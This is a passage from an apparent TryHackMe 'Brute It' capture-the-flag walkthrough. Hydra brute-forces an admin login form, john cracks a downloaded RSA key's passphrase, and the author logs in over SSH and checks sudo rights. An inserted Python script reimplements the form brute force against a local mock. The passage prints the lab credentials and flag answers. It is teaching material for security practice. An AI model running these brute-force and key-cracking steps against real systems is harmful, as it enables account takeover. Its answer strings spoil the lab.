Now that we know the username, we can use hydra to brute force the password. The http-post-form module takes three colon-separated fields: the path of the login script, the POST body with ^USER^ and ^PASS^ placeholders, and an F= condition naming a string that appears in the response only when the login fails. Any response that does not contain that string is reported as a valid password, so the failure string must be copied exactly from a failed login attempt.
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.30.186 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=username or password invalid"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-07 09:48:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.30.186:80/admin/index.php:user=^USER^&pass=^PASS^:F=username or password invalid
[80][http-post-form] host: 10.10.30.186 login: admin password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-07 09:49:25
Answer
admin:xavier
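The following is an added example, not part of the original write-up, showing in Python what hydra's http-post-form module does with the F= condition above. It stands up a local imitation of the /admin/index.php login form on 127.0.0.1 (the credentials, the wordlist and the response bodies are constructed for the demo), POSTs user/pass for each candidate, and treats any response that lacks the failure string as a hit. The helper names (try_login, brute_force, demo) are this example's own.

```python
"""Form brute force with hydra-style failure-string matching.

Added example (not from the original page): a local stand-in for the
/admin/index.php form plus the check hydra's http-post-form module
applies with "F=username or password invalid".
"""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed credentials for the mock target; chosen to match the write-up.
VALID_USER = "admin"
VALID_PASS = "xavier"
FAILURE_STRING = "username or password invalid"


class LoginHandler(BaseHTTPRequestHandler):
    """Minimal imitation of a PHP login form: POST user/pass, return a message."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("user", [""])[0]
        password = form.get("pass", [""])[0]
        if user == VALID_USER and password == VALID_PASS:
            body = b"<h1>Welcome to the admin panel</h1>"
        else:
            body = b"<p>username or password invalid</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_server():
    """Bind the mock form to an ephemeral port and serve it in the background."""
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_login(url, user, password, failure_string):
    """POST one credential pair; True when the response lacks the failure string.

    This is the F= rule: the absence of the failure text is taken as success,
    so an error page or WAF block page would also count as a hit.
    """
    data = urllib.parse.urlencode({"user": user, "pass": password}).encode()
    try:
        with urllib.request.urlopen(url, data=data, timeout=5) as resp:
            body = resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode(errors="replace")
    return failure_string not in body


def brute_force(url, user, wordlist, failure_string=FAILURE_STRING):
    """Return the first candidate that passes the failure-string check, else None."""
    for candidate in wordlist:
        if try_login(url, user, candidate, failure_string):
            return candidate
    return None


def demo(wordlist=None):
    """Run the attack against the local mock and return the recovered password."""
    if wordlist is None:  # constructed mini wordlist standing in for rockyou.txt
        wordlist = ["123456", "password", "letmein", "xavier", "rockinroll"]
    server = start_server()
    try:
        url = "http://127.0.0.1:%d/admin/index.php" % server.server_address[1]
        return brute_force(url, "admin", wordlist)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("admin:%s" % demo())
```

Because success is inferred from the absence of a string, verify any hit by hand: a target that rate-limits or returns an error page for some requests will produce false positives with F=, and hydra's S= (success string) form is the safer choice when a distinctive success message exists.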
Crack the RSA key you found.
What is John's RSA Private Key passphrase?
Let's log in with admin as the username and xavier as the password.
Let's download the RSA private key for the user john.
$ wget http://10.10.30.186/admin/panel/id_rsa
--2023-12-07 09:59:03-- http://10.10.30.186/admin/panel/id_rsa
Connecting to 10.10.30.186:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1766 (1.7K)
Saving to: ‘id_rsa’
id_rsa 100%[========================================================================================================================================>] 1.72K --.-KB/s in 0s
2023-12-07 09:59:04 (3.21 No error) - ‘id_rsa’ saved [1766/1766]
We can use ssh2john to create a hash file.
$ ssh2john id_rsa > id_hash
Now we can use john to crack the hash. The Cost lines in the output below explain why this finishes almost instantly: the key is in the legacy PEM format (MD5-based key derivation, iteration count 1), so each guess costs a single MD5 pass, unlike the modern OpenSSH key format whose bcrypt KDF makes every guess far more expensive.
$ john id_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll (id_rsa)
1g 0:00:00:00 DONE (2023-12-07 10:04) 4.000g/s 290496p/s 290496c/s 290496C/s romeo23..renatito
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Answer
rockinroll
user.txt
SSH refuses to use a private key that is readable by group or others, so restrict the file to its owner first (600 is the usual setting for a key file; 700 also satisfies the check).
$ chmod 700 id_rsa
Now that we know that the passphrase for john's key is rockinroll, let's log in through SSH.
$ ssh -i id_rsa john@10.10.30.186
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Dec 7 04:40:36 UTC 2023
System load: 0.0 Processes: 102
Usage of /: 25.7% of 19.56GB Users logged in: 0
Memory usage: 36% IP address for eth0: 10.10.30.186
Swap usage: 0%
63 packages can be updated.
0 updates are security updates.
Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$
Let's read the user.txt file.
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt
THM{a_password_is_not_a_barrier}
Answer
THM{a_password_is_not_a_barrier}
Web flag
The web flag was present on the page with the RSA private key.
THM{brut3_f0rce_is_e4sy}
Task 4: Privilege Escalation
Find a form to escalate your privileges.
What is the root's password?
Let's check what sudo commands john has the permission to execute.
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on bruteit:
(root) NOPASSWD: /bin/cat